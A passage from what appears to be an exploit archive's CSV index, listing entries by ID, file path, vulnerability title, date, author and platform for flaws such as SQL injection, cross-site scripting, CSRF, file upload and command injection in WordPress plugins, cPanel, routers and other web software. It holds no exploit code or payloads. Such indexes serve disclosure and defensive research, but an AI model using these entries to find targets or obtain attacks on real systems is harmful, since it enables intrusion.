Security Team",php,webapps, -38051,exploits/php/webapps/38051.txt,"Bedita 3.5.1 - Cross-Site Scripting",2015-09-01,"Sébastien Morin",php,webapps,80 -38056,exploits/hardware/webapps/38056.txt,"Edimax BR6228nS/BR6228nC - Multiple Vulnerabilities",2015-09-01,smash,hardware,webapps,80 -38057,exploits/php/webapps/38057.txt,"WordPress Theme Magazine Basic - 'id' SQL Injection",2012-11-22,"Novin hack",php,webapps, -38060,exploits/php/webapps/38060.txt,"WordPress Plugin Ads Box - 'count' SQL Injection",2012-11-26,"Ashiyane Digital Security Team",php,webapps, -38061,exploits/php/webapps/38061.txt,"Beat Websites - 'id' SQL Injection",2012-11-24,Metropolis,php,webapps, -38062,exploits/multiple/webapps/38062.txt,"Forescout CounterACT - 'a' Open Redirection",2012-11-26,"Joseph Sheridan",multiple,webapps, -38063,exploits/php/webapps/38063.txt,"WordPress Theme Wp-ImageZoom - 'id' SQL Injection",2012-11-26,Amirh03in,php,webapps, -38064,exploits/php/webapps/38064.txt,"WordPress Theme CStar Design - 'id' SQL Injection",2012-11-27,Amirh03in,php,webapps, -38068,exploits/php/webapps/38068.txt,"MantisBT 1.2.19 - Host Header",2015-09-02,"Pier-Luc Maltais",php,webapps,80 -38071,exploits/php/webapps/38071.rb,"YesWiki 0.2 - 'squelette' Directory Traversal",2015-09-02,HaHwul,php,webapps,80 -38073,exploits/hardware/webapps/38073.html,"GPON Home Router FTP G-93RG1 - Cross-Site Request Forgery / Command Execution",2015-09-02,"Phan Thanh Duy",hardware,webapps,80 -38074,exploits/php/webapps/38074.txt,"Cerb 7.0.3 - Cross-Site Request Forgery",2015-09-02,"High-Tech Bridge SA",php,webapps,80 -38086,exploits/php/webapps/38086.html,"WordPress Plugin Contact Form Generator 2.0.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2015-09-06,"i0akiN SEC-LABORATORY",php,webapps,80 -38076,exploits/php/webapps/38076.txt,"BigDump 0.29b and 0.32b - Multiple Vulnerabilities",2012-11-28,Ur0b0r0x,php,webapps, -38077,exploits/php/webapps/38077.txt,"WordPress Theme Toolbox - 'mls' SQL Injection",2012-11-29,"Ashiyane Digital Security Team",php,webapps, -38078,exploits/php/webapps/38078.py,"Elastix - 'page' Cross-Site Scripting",2012-11-29,cheki,php,webapps, -38099,exploits/php/webapps/38099.txt,"TinyMCPUK - 'test' Cross-Site Scripting",2012-12-01,eidelweiss,php,webapps, -38080,exploits/hardware/webapps/38080.txt,"Zhone ADSL2+ 4P Bridge & Router (Broadcom) - Multiple Vulnerabilities",2015-09-04,Vulnerability-Lab,hardware,webapps, -38081,exploits/hardware/webapps/38081.txt,"HooToo Tripmate HT-TM01 2.000.022 - Cross-Site Request Forgery",2015-09-04,"Ken Smith",hardware,webapps,80 -38090,exploits/php/webapps/38090.txt,"FireEye Appliance - Unauthorized File Disclosure",2015-09-06,"Kristian Erik Hermansen",php,webapps,443 -38091,exploits/php/webapps/38091.php,"Elastix < 2.5 - PHP Code Injection",2015-09-06,i-Hmx,php,webapps, -38101,exploits/php/webapps/38101.txt,"WordPress Plugin Zingiri Forums - 'language' Local File Inclusion",2012-12-30,Amirh03in,php,webapps, -38102,exploits/php/webapps/38102.txt,"WordPress Theme Nest - 'codigo' SQL Injection",2012-12-04,"Ashiyane Digital Security Team",php,webapps, -38103,exploits/php/webapps/38103.txt,"Sourcefabric Newscoop - 'f_email' SQL Injection",2012-12-04,AkaStep,php,webapps, -38097,exploits/hardware/webapps/38097.txt,"NETGEAR Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation",2015-09-07,"Elliott Lewis",hardware,webapps,80 -38098,exploits/jsp/webapps/38098.txt,"JSPMySQL Administrador - Multiple Vulnerabilities",2015-09-07,hyp3rlinx,jsp,webapps,8081 -38105,exploits/php/webapps/38105.txt,"WordPress Theme White-Label Framework 2.0.6 - Cross-Site Scripting",2015-09-08,Outlasted,php,webapps,80 -38110,exploits/php/webapps/38110.txt,"DirectAdmin Web Control Panel 1.483 - Multiple Vulnerabilities",2015-09-08,"Ashiyane Digital Security Team",php,webapps, -38111,exploits/php/webapps/38111.txt,"WordPress Plugin Simple Gmail Login - Stack Trace Information Disclosure",2012-12-07,"Aditya Balapure",php,webapps, -38112,exploits/php/webapps/38112.txt,"FOOT Gestion - 'id' SQL Injection",2012-12-07,"Emmanuel Farcy",php,webapps, -38113,exploits/php/webapps/38113.php,"vBulletin ajaxReg Module - SQL Injection",2012-12-08,"Cold Zero",php,webapps, -38114,exploits/cgi/webapps/38114.html,"Smartphone Pentest Framework - Multiple Remote Command Execution Vulnerabilities",2012-12-10,"High-Tech Bridge",cgi,webapps, -38115,exploits/php/webapps/38115.txt,"SimpleInvoices invoices Module - Customer Field Cross-Site Scripting",2012-12-10,tommccredie,php,webapps, -38118,exploits/xml/webapps/38118.txt,"Qlikview 11.20 SR11 - Blind XML External Entity Injection",2015-09-09,"Alex Haynes",xml,webapps, -38119,exploits/php/webapps/38119.html,"Auto-Exchanger 5.1.0 - Cross-Site Request Forgery",2015-09-09,"Aryan Bayaninejad",php,webapps, -38127,exploits/php/webapps/38127.php,"PHP 5.5.9 - CGIMode FPM WriteProcMemFile Bypass Disable Function",2015-09-10,ylbhz,php,webapps, -38128,exploits/cgi/webapps/38128.txt,"Synology Video Station 1.5-0757 - Multiple Vulnerabilities",2015-09-10,"Han Sahin",cgi,webapps,5000 -38129,exploits/php/webapps/38129.txt,"Octogate UTM 3.0.12 - Admin Interface Directory Traversal",2015-09-10,"Oliver Karow",php,webapps, -38130,exploits/java/webapps/38130.txt,"N-able N-central - Cross-Site Request Forgery",2012-12-13,Cartel,java,webapps, -38131,exploits/php/webapps/38131.txt,"PHP Address Book - 'group' Cross-Site Scripting",2012-12-13,"Kenneth F. Belva",php,webapps, -38133,exploits/php/webapps/38133.txt,"WordPress Plugin RokBox Plugin - '/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf?abouttext' Cross-Site Scripting",2012-12-17,MustLive,php,webapps, -38134,exploits/php/webapps/38134.txt,"Joomla! Component com_ztautolink - 'Controller' Local File Inclusion",2012-12-19,Xr0b0t,php,webapps, -38135,exploits/php/webapps/38135.txt,"Joomla! Component com_bit - 'Controller' Local File Inclusion",2012-12-19,Xr0b0t,php,webapps, -38139,exploits/php/webapps/38139.txt,"MyBB Transactions Plugin - 'transaction' SQL Injection",2012-12-18,limb0,php,webapps, -38140,exploits/php/webapps/38140.php,"VoipNow Service Provider Edition - Arbitrary Command Execution",2012-12-21,i-Hmx,php,webapps, -38141,exploits/php/webapps/38141.txt,"Hero Framework - 'search?q' Cross-Site Scripting",2012-12-24,"Stefan Schurtz",php,webapps, -38142,exploits/php/webapps/38142.txt,"Hero Framework - users/login 'Username' Cross-Site Scripting",2012-12-24,"Stefan Schurtz",php,webapps, -38143,exploits/php/webapps/38143.txt,"cPanel - 'account' Cross-Site Scripting",2012-12-24,"Rafay Baloch",php,webapps, -38144,exploits/php/webapps/38144.txt,"City Reviewer - 'search.php' Script SQL Injection",2012-12-22,3spi0n,php,webapps, -38148,exploits/php/webapps/38148.txt,"Monsta FTP 1.6.2 - Multiple Vulnerabilities",2015-09-11,hyp3rlinx,php,webapps,80 -38204,exploits/php/webapps/38204.txt,"Prizm Content Connect - Arbitrary File Upload",2013-01-09,"Include Security Research",php,webapps, -38152,exploits/php/webapps/38152.txt,"MotoCMS - admin/data/users.xml Access Restriction Weakness Information Disclosure",2013-01-08,AkaStep,php,webapps, -38153,exploits/php/webapps/38153.txt,"cPanel WebHost Manager (WHM) - '/webmail/x3/mail/clientconf.html?acct' Cross-Site Scripting",2012-12-27,"Christy Philip Mathew",php,webapps, -38154,exploits/php/webapps/38154.txt,"cPanel - 'detailbw.html' Multiple Cross-Site Scripting Vulnerabilities",2012-12-27,"Christy Philip Mathew",php,webapps, -38155,exploits/php/webapps/38155.txt,"WHM - 'filtername' Cross-Site Scripting",2012-12-27,"Rafay Baloch",php,webapps, -38156,exploits/php/webapps/38156.txt,"cPanel - 'dir' Cross-Site Scripting",2012-12-26,"Rafay Baloch",php,webapps, -38157,exploits/php/webapps/38157.txt,"WordPress Plugin Xerte Online - 'save.php' Arbitrary File Upload",2013-01-02,"Sammy FORGIT",php,webapps, -38158,exploits/php/webapps/38158.txt,"WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php? reqID' SQL Injection",2013-01-01,"Sammy FORGIT",php,webapps, -38159,exploits/php/webapps/38159.txt,"WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/backup.php?reqID' SQL Injection",2013-01-01,"Sammy FORGIT",php,webapps, -38160,exploits/php/webapps/38160.txt,"WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/exportaccounts.php?reqID' SQL Injection",2013-01-01,"Sammy FORGIT",php,webapps, -38161,exploits/php/webapps/38161.txt,"osTicket - 'l.php?url' Arbitrary Site Redirect",2013-01-02,AkaStep,php,webapps, -38162,exploits/php/webapps/38162.txt,"osTicket - 'tickets.php?status' Cross-Site Scripting",2013-01-02,AkaStep,php,webapps, -38163,exploits/php/webapps/38163.txt,"WordPress Plugin Uploader - Arbitrary File Upload",2013-01-03,"Sammy FORGIT",php,webapps, -38166,exploits/php/webapps/38166.txt,"WHMCS 5.0 - Insecure Cookie Authentication Bypass",2012-12-31,Agd_Scorp,php,webapps, -38167,exploits/php/webapps/38167.php,"Multiple WordPress WPScientist Themes - Arbitrary File Upload",2013-01-04,JingoBD,php,webapps, -38168,exploits/php/webapps/38168.txt,"TomatoCart - 'json.php' Security Bypass",2013-01-04,"Aung Khant",php,webapps, -38169,exploits/php/webapps/38169.txt,"Havalite CMS - 'comment' HTML Injection",2013-01-06,"Henri Salo",php,webapps, -38171,exploits/php/webapps/38171.txt,"Joomla! Component com_incapsula - Multiple Cross-Site Scripting Vulnerabilities",2013-01-08,"Gjoko Krstic",php,webapps, -38178,exploits/php/webapps/38178.txt,"WordPress Plugin NextGEN Gallery - 'test-head' Cross-Site Scripting",2013-01-08,Am!r,php,webapps, -38173,exploits/multiple/webapps/38173.txt,"ManageEngine EventLog Analyzer < 10.6 build 10060 - SQL Execution",2015-09-14,xistence,multiple,webapps, -38174,exploits/multiple/webapps/38174.txt,"ManageEngine OpManager 11.5 - Multiple Vulnerabilities",2015-09-14,xistence,multiple,webapps, -38176,exploits/php/webapps/38176.txt,"WordPress Plugin EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities",2015-09-14,"Felipe Molina",php,webapps, -38182,exploits/php/webapps/38182.txt,"tinybrowser - 'type' Cross-Site Scripting",2013-01-09,MustLive,php,webapps, -38183,exploits/php/webapps/38183.txt,"tinybrowser - 'tinybrowser.php' Directory Listing",2013-01-09,MustLive,php,webapps, -38184,exploits/php/webapps/38184.txt,"tinybrowser - 'edit.php' Directory Listing",2013-01-09,MustLive,php,webapps, -38187,exploits/php/webapps/38187.txt,"WordPress Plugin CP Reservation Calendar 1.1.6 - SQL Injection",2015-09-15,"i0akiN SEC-LABORATORY",php,webapps,80 -38188,exploits/jsp/webapps/38188.txt,"Openfire 3.10.2 - Unrestricted Arbitrary File Upload",2015-09-15,hyp3rlinx,jsp,webapps,80 -38189,exploits/jsp/webapps/38189.txt,"Openfire 3.10.2 - Remote File Inclusion",2015-09-15,hyp3rlinx,jsp,webapps, -38190,exploits/jsp/webapps/38190.txt,"Openfire 3.10.2 - Privilege Escalation",2015-09-15,hyp3rlinx,jsp,webapps,80 -38191,exploits/jsp/webapps/38191.txt,"Openfire 3.10.2 - Multiple Cross-Site Scripting Vulnerabilities",2015-09-15,hyp3rlinx,jsp,webapps,80 -38192,exploits/jsp/webapps/38192.txt,"Openfire 3.10.2 - Cross-Site Request Forgery",2015-09-15,hyp3rlinx,jsp,webapps,80 -38197,exploits/php/webapps/38197.txt,"Silver Peak VXOA < 6.2.11 - Multiple Vulnerabilities",2015-09-15,Security-Assessment.com,php,webapps,80 -38207,exploits/php/webapps/38207.txt,"Quick.CMS / Quick.Cart - Cross-Site Scripting",2013-01-09,"High-Tech Bridge",php,webapps, -38209,exploits/php/webapps/38209.txt,"WordPress Plugin Gallery - 'filename_1' Arbitrary File Access",2013-01-10,Beni_Vanda,php,webapps, -38210,exploits/php/webapps/38210.txt,"Kirby CMS 2.1.0 - Cross-Site Request Forgery / Content Upload / PHP Script Execution",2015-09-22,"Dawid Golunski",php,webapps, -38256,exploits/php/webapps/38256.py,"h5ai < 0.25.0 - Unrestricted Arbitrary File Upload",2015-09-22,rTheory,php,webapps,80 -38258,exploits/ios/webapps/38258.txt,"Air Drive Plus 2.4 - Arbitrary File Upload",2015-09-22,Vulnerability-Lab,ios,webapps,8000 -38213,exploits/php/webapps/38213.txt,"FAROL - SQL Injection",2015-09-16,"Thierry Fernandes Faria",php,webapps,80 -38223,exploits/php/webapps/38223.txt,"ZeusCart 4.0 - Cross-Site Request Forgery",2015-09-17,"Curesec Research Team",php,webapps,80 -38224,exploits/php/webapps/38224.txt,"ZeusCart 4.0 - SQL Injection",2015-09-17,"Curesec Research Team",php,webapps,80 -38228,exploits/php/webapps/38228.txt,"phpLiteAdmin - 'table' SQL Injection",2013-01-15,KedAns-Dz,php,webapps, -38229,exploits/php/webapps/38229.txt,"IP.Gallery - 'img' SQL Injection",2013-01-17,"Ashiyane Digital Security Team",php,webapps, -38231,exploits/php/webapps/38231.txt,"Scripts Genie Classified Ultra - SQL Injection / Cross-Site Scripting",2013-01-20,3spi0n,php,webapps, -38234,exploits/php/webapps/38234.txt,"DigiLIBE - Execution-After-Redirect Information Disclosure",2013-01-22,"Robert Gilbert",php,webapps, -38235,exploits/jsp/webapps/38235.txt,"Perforce P4Web - Multiple Cross-Site Scripting Vulnerabilities",2013-01-22,"Christy Philip Mathew",jsp,webapps, -38236,exploits/php/webapps/38236.txt,"gpEasy CMS - 'section' Cross-Site Scripting",2013-01-23,"High-Tech Bridge SA",php,webapps, -38237,exploits/php/webapps/38237.txt,"WordPress Theme Chocolate WP - Multiple Vulnerabilities",2013-01-23,"Eugene Dokukin",php,webapps, -38238,exploits/php/webapps/38238.txt,"PHPWeby Free Directory Script - 'contact.php' Multiple SQL Injections",2013-01-25,AkaStep,php,webapps, -38241,exploits/php/webapps/38241.txt,"Pligg CMS 2.0.2 - 'load_data_for_search.php' SQL Injection",2015-09-18,jsass,php,webapps,80 -38245,exploits/hardware/webapps/38245.txt,"ADH-Web Server IP-Cameras - Multiple Vulnerabilities",2015-09-20,Orwelllabs,hardware,webapps, -38246,exploits/php/webapps/38246.txt,"iCart Pro - 'section' SQL Injection",2013-01-25,n3tw0rk,php,webapps, -38251,exploits/php/webapps/38251.txt,"WordPress Plugin WP-Table Reloaded - 'id' Cross-Site Scripting",2013-01-24,hiphop,php,webapps, -38255,exploits/php/webapps/38255.txt,"Kirby CMS 2.1.0 - Authentication Bypass",2015-09-22,"Dawid Golunski",php,webapps,80 -38261,exploits/xml/webapps/38261.txt,"SAP NetWeaver < 7.01 - XML External Entity Injection",2015-09-22,"Lukasz Miedzinski",xml,webapps, -38290,exploits/php/webapps/38290.txt,"WordPress Theme flashnews - Multiple Input Validation Vulnerabilities",2013-02-02,MustLive,php,webapps, -38291,exploits/php/webapps/38291.txt,"EasyITSP - 'voicemail.php' Directory Traversal",2013-02-04,"Michal Blaszczak",php,webapps, -38292,exploits/php/webapps/38292.txt,"refbase 0.9.6 - Multiple Vulnerabilities",2015-09-23,"Mohab Ali",php,webapps, -38294,exploits/php/webapps/38294.txt,"ezStats2 - 'style.php' Local File Inclusion",2013-02-06,L0n3ly-H34rT,php,webapps, -38295,exploits/php/webapps/38295.txt,"ezStats for Battlefield 3 - '/ezStats2/compare.php' Multiple Cross-Site Scripting Vulnerabilities",2013-02-06,L0n3ly-H34rT,php,webapps, -38296,exploits/php/webapps/38296.txt,"WordPress Plugin CommentLuv - '_ajax_nonce' Cross-Site Scripting",2013-02-06,"High-Tech Bridge",php,webapps, -38297,exploits/php/webapps/38297.txt,"WordPress Plugin Wysija Newsletters - Multiple SQL Injections",2013-02-06,"High-Tech Bridge",php,webapps, -38300,exploits/php/webapps/38300.txt,"WordPress Plugin Audio Player - 'playerID' Cross-Site Scripting",2013-01-31,hiphop,php,webapps, -38301,exploits/php/webapps/38301.txt,"WordPress Theme Pinboard - 'tab' Cross-Site Scripting",2013-02-09,"Henrique Montenegro",php,webapps, -38304,exploits/php/webapps/38304.py,"SMF (Simple Machine Forum) 2.0.10 - Remote Memory Exfiltration",2015-09-24,"Filippo Roncari",php,webapps, -38309,exploits/php/webapps/38309.txt,"osCommerce - Cross-Site Request Forgery",2013-02-12,"Jakub Galczyk",php,webapps, -38311,exploits/php/webapps/38311.txt,"BlackNova Traders - 'news.php' SQL Injection",2013-02-12,ITTIHACK,php,webapps, -40882,exploits/php/webapps/40882.txt,"Edge SkateShop - Authentication bypass",2016-12-06,Delilah,php,webapps, -38314,exploits/php/webapps/38314.txt,"WordPress Plugin NextGEN Gallery - Full Path Disclosure",2013-02-14,"Henrique Montenegro",php,webapps, -38315,exploits/php/webapps/38315.txt,"Sonar - Multiple Cross-Site Scripting Vulnerabilities",2013-02-12,DevilTeam,php,webapps, -38316,exploits/cgi/webapps/38316.txt,"FortiManager 5.2.2 - Persistent Cross-Site Scripting",2015-09-25,hyp3rlinx,cgi,webapps, -38318,exploits/asp/webapps/38318.txt,"MIMEsweeper For SMTP - Multiple Cross-Site Scripting Vulnerabilities",2013-02-18,"Anastasios Monachos",asp,webapps, -38320,exploits/php/webapps/38320.txt,"Squirrelcart - 'table' Cross-Site Scripting",2013-02-19,"Gjoko Krstic",php,webapps, -38321,exploits/php/webapps/38321.txt,"X2Engine 4.2 - Cross-Site Request Forgery",2015-09-25,Portcullis,php,webapps,80 -38322,exploits/php/webapps/38322.txt,"CKEditor - 'posteddata.php' Cross-Site Scripting",2013-02-19,AkaStep,php,webapps, -38323,exploits/php/webapps/38323.txt,"X2Engine 4.2 - Arbitrary File Upload",2015-09-25,Portcullis,php,webapps,80 -38324,exploits/php/webapps/38324.txt,"WordPress Plugin Pretty Link - Cross-Site Scripting",2013-02-20,hiphop,php,webapps, -38326,exploits/php/webapps/38326.txt,"ZenPhoto - 'index.php' SQL Injection",2013-02-20,HosseinNsn,php,webapps, -38327,exploits/php/webapps/38327.txt,"PHPmyGallery 1.5 - Local File Disclosure / Cross-Site Scripting",2013-02-21,TheMirkin,php,webapps, -38328,exploits/php/webapps/38328.txt,"OpenEMR - 'site' Cross-Site Scripting",2013-02-21,"Gjoko Krstic",php,webapps, -38329,exploits/php/webapps/38329.txt,"ZeroClipboard 1.9.x - 'id' Cross-Site Scripting",2013-02-20,MustLive,php,webapps, -38331,exploits/php/webapps/38331.txt,"WordPress Plugin Smart Flv - 'jwplayer.swf' Multiple Cross-Site Scripting Vulnerabilities",2013-02-25,"Henri Salo",php,webapps, -38332,exploits/php/webapps/38332.txt,"Batavi - 'index.php' Cross-Site Scripting",2013-03-01,Dognaedis,php,webapps, -38333,exploits/php/webapps/38333.txt,"phpMyRecipes - Multiple HTML Injection Vulnerabilities",2013-02-25,PDS,php,webapps, -38334,exploits/jsp/webapps/38334.txt,"JForum - 'jforum.page' Multiple Cross-Site Scripting Vulnerabilities",2013-02-26,ZeroDayLab,jsp,webapps, -38335,exploits/php/webapps/38335.txt,"Geeklog - Cross-Site Scripting",2013-02-27,"High-Tech Bridge",php,webapps, -38338,exploits/jsp/webapps/38338.txt,"Mango Automation 2.6.0 - Multiple Vulnerabilities",2015-09-28,LiquidWorm,jsp,webapps,80 -38339,exploits/php/webapps/38339.txt,"Centreon 2.6.1 - Multiple Vulnerabilities",2015-09-28,LiquidWorm,php,webapps,80 -38342,exploits/ios/webapps/38342.txt,"My.WiFi USB Drive 1.0 iOS - Local File Inclusion",2015-09-28,Vulnerability-Lab,ios,webapps,8080 -38343,exploits/ios/webapps/38343.txt,"Photos in Wifi 1.0.1 iOS - Arbitrary File Upload",2015-09-28,Vulnerability-Lab,ios,webapps, -38345,exploits/php/webapps/38345.txt,"vTiger CRM 6.3.0 - Authenticated Remote Code Execution",2015-09-28,"Benjamin Daniel Mussler",php,webapps,80 -38350,exploits/hardware/webapps/38350.txt,"Western Digital My Cloud 04.01.03-421/04.01.04-422 - Command Injection",2015-09-29,absane,hardware,webapps, -38351,exploits/asp/webapps/38351.txt,"Kaseya Virtual System Administrator (VSA) - Multiple Vulnerabilities (2)",2015-09-29,"Pedro Ribeiro",asp,webapps, -38354,exploits/php/webapps/38354.txt,"Plogger - Multiple Input Validation Vulnerabilities",2013-03-02,"Saadat Ullah",php,webapps, -38355,exploits/php/webapps/38355.txt,"WordPress Plugin Uploader - 'blog' Cross-Site Scripting",2013-03-01,CodeV,php,webapps, -38358,exploits/java/webapps/38358.txt,"HP Intelligent Management Center - 'topoContent.jsf' Cross-Site Scripting",2013-03-04,"Julien Ahrens",java,webapps, -38359,exploits/php/webapps/38359.txt,"WordPress Plugin Count Per Day - 'daytoshow' Cross-Site Scripting",2013-03-05,alejandr0.m0f0,php,webapps, -38363,exploits/php/webapps/38363.txt,"File Manager - HTML Injection / Local File Inclusion",2013-02-23,"Benjamin Kunz Mejri",php,webapps, -38366,exploits/multiple/webapps/38366.py,"Verax NMS - Multiple Method Authentication Bypass",2013-02-06,"Andrew Brooks",multiple,webapps, -38367,exploits/php/webapps/38367.txt,"Your Own Classifieds - Cross-Site Scripting",2013-03-08,"Rafay Baloch",php,webapps, -38369,exploits/hardware/webapps/38369.txt,"Bosch Security Systems Dinion NBN-498 - Web Interface XML Injection",2015-10-01,neom22,hardware,webapps, -38372,exploits/php/webapps/38372.html,"Question2Answer - Cross-Site Request Forgery",2013-03-01,MustLive,php,webapps, -38373,exploits/php/webapps/38373.txt,"WordPress Plugin Terillion Reviews - Profile Id HTML Injection",2013-03-08,"Aditya Balapure",php,webapps, -38374,exploits/php/webapps/38374.txt,"SWFupload - Multiple Content Spoofing / Cross-Site Scripting Vulnerabilities",2013-03-10,MustLive,php,webapps, -38375,exploits/php/webapps/38375.txt,"Asteriskguru Queue Statistics - 'warning' Cross-Site Scripting",2013-03-10,"Manuel García Cárdenas",php,webapps, -38376,exploits/php/webapps/38376.txt,"WordPress Plugin podPress - 'playerID' Cross-Site Scripting",2013-03-11,hiphop,php,webapps, -38377,exploits/php/webapps/38377.txt,"Privoxy Proxy - Authentication Information Disclosure",2013-03-11,"Chris John Riley",php,webapps, -38379,exploits/windows/webapps/38379.txt,"FTGate 2009 Build 6.4.00 - Multiple Vulnerabilities",2015-10-02,hyp3rlinx,windows,webapps, -38380,exploits/windows/webapps/38380.txt,"FTGate 7 - Cross-Site Request Forgery",2015-10-02,hyp3rlinx,windows,webapps, -38383,exploits/linux/webapps/38383.py,"ElasticSearch 1.6.0 - Arbitrary File Download",2015-10-02,"Pedro Andujar",linux,webapps,9200 -38385,exploits/php/webapps/38385.txt,"KindEditor - Multiple Arbitrary File Upload Vulnerabilities",2013-03-11,KedAns-Dz,php,webapps, -38386,exploits/php/webapps/38386.txt,"PHPBoost - Arbitrary File Upload / Information Disclosure",2013-03-11,KedAns-Dz,php,webapps, -38391,exploits/php/webapps/38391.txt,"Petite Annonce - Cross-Site Scripting",2013-03-14,Metropolis,php,webapps, -38393,exploits/php/webapps/38393.html,"WordPress Plugin Occasions - Cross-Site Request Forgery",2013-03-19,m3tamantra,php,webapps, -38395,exploits/jsp/webapps/38395.txt,"ManageEngine ServiceDesk Plus 9.1 build 9110 - Directory Traversal",2015-10-05,xistence,jsp,webapps,8080 -38537,exploits/php/webapps/38537.txt,"WordPress Plugin ADIF Log Search Widget - 'logbook_search.php' Cross-Site Scripting",2013-05-27,k3170makan,php,webapps, -38400,exploits/php/webapps/38400.txt,"Alienvault Open Source SIEM (OSSIM) 4.3 - Cross-Site Request Forgery",2015-10-05,"MohamadReza Mohajerani",php,webapps, -38406,exploits/php/webapps/38406.txt,"PHP-Fusion 7.02.07 - Blind SQL Injection",2015-10-06,"Manuel García Cárdenas",php,webapps, -38407,exploits/php/webapps/38407.txt,"GLPI 0.85.5 - Arbitrary File Upload / Filter Bypass / Remote Code Execution",2015-10-06,"Raffaele Forte",php,webapps, -38408,exploits/php/webapps/38408.txt,"Jaow CMS - 'add_ons' Cross-Site Scripting",2013-03-23,Metropolis,php,webapps, -38409,exploits/hardware/webapps/38409.html,"ZTE ZXHN H108N Router - Unauthenticated Configuration Disclosure",2015-10-06,"Todor Donev",hardware,webapps, -38410,exploits/php/webapps/38410.txt,"WordPress Plugin Banners Lite - 'wpbanners_show.php' HTML Injection",2013-03-25,"Fernando A. Lagos B",php,webapps, -38411,exploits/python/webapps/38411.txt,"Zope Management Interface 4.3.7 - Cross-Site Request Forgery",2015-10-07,hyp3rlinx,python,webapps, -38413,exploits/php/webapps/38413.txt,"OrionDB Web Directory - Multiple Cross-Site Scripting Vulnerabilities",2013-03-27,3spi0n,php,webapps, -38414,exploits/php/webapps/38414.txt,"WordPress Plugin Feedweb - 'wp_post_id' Cross-Site Scripting",2013-03-30,"Stefan Schurtz",php,webapps, -40407,exploits/aspx/webapps/40407.txt,"Microix Timesheet Module - SQL Injection",2016-09-22,"Anthony Cole",aspx,webapps, -38415,exploits/asp/webapps/38415.txt,"C2 WebResource - 'File' Cross-Site Scripting",2013-04-03,anonymous,asp,webapps, -38416,exploits/php/webapps/38416.txt,"e107 - 'content_preset.php' Cross-Site Scripting",2013-04-03,"Simon Bieber",php,webapps, -38417,exploits/php/webapps/38417.txt,"Symphony - 'sort' SQL Injection",2013-04-03,"High-Tech Bridge",php,webapps, -38418,exploits/php/webapps/38418.txt,"FUDforum - Multiple Remote PHP Code Injection Vulnerabilities",2013-04-03,"High-Tech Bridge",php,webapps, -38424,exploits/multiple/webapps/38424.txt,"Kallithea 0.2.9 - 'came_from' HTTP Response Splitting",2015-10-08,LiquidWorm,multiple,webapps, -38425,exploits/php/webapps/38425.txt,"PHP Address Book - '/addressbook/register/delete_user.php?id' SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps, -38426,exploits/php/webapps/38426.txt,"PHP Address Book - '/addressbook/register/edit_user.php?id' SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps, -38427,exploits/php/webapps/38427.txt,"PHP Address Book - '/addressbook/register/edit_user_save.php' Multiple SQL Injections",2013-04-05,"Jurgen Voorneveld",php,webapps, -38428,exploits/php/webapps/38428.txt,"PHP Address Book - '/addressbook/register/linktick.php?site' SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps, -38429,exploits/php/webapps/38429.txt,"PHP Address Book - '/addressbook/register/reset_password.php' Multiple SQL Injections",2013-04-05,"Jurgen Voorneveld",php,webapps, -38430,exploits/php/webapps/38430.txt,"PHP Address Book - '/addressbook/register/reset_password_save.php' Multiple SQL Injections",2013-04-05,"Jurgen Voorneveld",php,webapps, -38431,exploits/php/webapps/38431.txt,"PHP Address Book - '/addressbook/register/router.php?BasicLogin' Cookie SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps, -38432,exploits/php/webapps/38432.txt,"PHP Address Book - '/addressbook/register/traffic.php?var' SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps, -38433,exploits/php/webapps/38433.txt,"PHP Address Book - '/addressbook/register/user_add_save.php?email' SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps, -38434,exploits/php/webapps/38434.txt,"PHP Address Book - '/addressbook/register/checklogin.php?Username' SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps, -38435,exploits/php/webapps/38435.txt,"PHP Address Book - '/addressbook/register/admin_index.php?q' SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps, -38436,exploits/php/webapps/38436.txt,"Zimbra - 'aspell.php' Cross-Site Scripting",2013-04-05,"Michael Scherer",php,webapps, -38438,exploits/php/webapps/38438.txt,"EasyPHP - '/index.php' Authentication Bypass / Remote PHP Code Injection",2013-04-09,KedAns-Dz,php,webapps, -38439,exploits/php/webapps/38439.txt,"WordPress Plugin Traffic Analyzer - 'aoid' Cross-Site Scripting",2013-04-09,Beni_Vanda,php,webapps, -38440,exploits/php/webapps/38440.txt,"phpMyAdmin - 'tbl_gis_visualization.php' Multiple Cross-Site Scripting Vulnerabilities",2013-04-09,waraxe,php,webapps, -38441,exploits/php/webapps/38441.txt,"WordPress Plugin Spiffy XSPF Player - 'playlist_id' SQL Injection",2013-04-10,"Ashiyane Digital Security Team",php,webapps, -38443,exploits/php/webapps/38443.txt,"Liferay 6.1.0 CE - Privilege Escalation",2015-10-11,"Massimo De Luca",php,webapps, -38445,exploits/php/webapps/38445.txt,"Joomla! Component com_realestatemanager 3.7 - SQL Injection",2015-10-11,"Omer Ramić",php,webapps, -38446,exploits/php/webapps/38446.html,"Dream CMS 2.3.0 - Cross-Site Request Forgery (Add Extension) / Arbitrary File Upload / PHP Code Execution",2015-10-11,LiquidWorm,php,webapps, -38448,exploits/hardware/webapps/38448.txt,"F5 Big-IP 10.2.4 Build 595.0 Hotfix HF3 - Directory Traversal",2015-10-13,"Karn Ganeshen",hardware,webapps, -38449,exploits/hardware/webapps/38449.txt,"NETGEAR Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities",2015-10-13,"Karn Ganeshen",hardware,webapps, -38450,exploits/php/webapps/38450.txt,"Kerio Control 8.6.1 - Multiple Vulnerabilities",2015-10-13,"Raschin Tavakoli",php,webapps, -38455,exploits/hardware/webapps/38455.txt,"ZYXEL PMG5318-B20A - OS Command Injection",2015-10-14,"Karn Ganeshen",hardware,webapps, -38476,exploits/php/webapps/38476.txt,"Todoo Forum 2.0 - 